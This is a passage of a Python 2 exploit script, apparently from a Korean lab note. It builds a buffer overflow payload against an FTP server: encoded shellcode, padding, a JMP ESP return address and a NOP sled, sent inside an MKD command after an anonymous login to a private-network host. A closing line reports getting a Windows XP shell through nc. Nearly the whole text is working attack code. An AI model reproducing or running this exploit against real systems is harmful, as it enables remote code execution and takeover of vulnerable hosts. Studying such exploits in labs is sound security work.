buf += "\xae\xcd\x18\x37\xa7\x5a\xd6\xd6\x8a\xfb\xe7\xf2\x7c"
buf += "\x9f\x7a\x99\x7c\xd6\x66\x36\x2b\xbf\x59\x4f\xb9\x2d"
buf += "\xc3\xf9\xdf\xaf\x95\xc2\x5b\x74\x66\xcc\x62\xf9\xd2"
buf += "\xea\x74\xc7\xdb\xb6\x20\x97\x8d\x60\x9e\x51\x64\xc3"
buf += "\x48\x08\xdb\x8d\x1c\xcd\x17\x0e\x5a\xd2\x7d\xf8\x82"
buf += "\x63\x28\xbd\xbd\x4c\xbc\x49\xc6\xb0\x5c\xb5\x1d\x71"
buf += "\x6c\xfc\x3f\xd0\xe5\x59\xaa\x60\x68\x5a\x01\xa6\x95"
buf += "\xd9\xa3\x57\x62\xc1\xc6\x52\x2e\x45\x3b\x2f\x3f\x20"
buf += "\x3b\x9c\x40\x61"

DUMMY = "A"*247
NOP="\x90"*100
#SHELLCODE = "C"*100
JMP = struct.pack('<L', 0x7c86467b)

evil = DUMMY+JMP+NOP+buf


s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.236.183',21))

print s.recv(1024)
s.send('USER anonymous\r\n')
print s.recv(1024)
s.send('PASS anonymous\r\n')
print s.recv(1024)
s.send('MKD ' + evil + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close

Local에서 nc를 이용해 window xp의 shell을 획득하였다.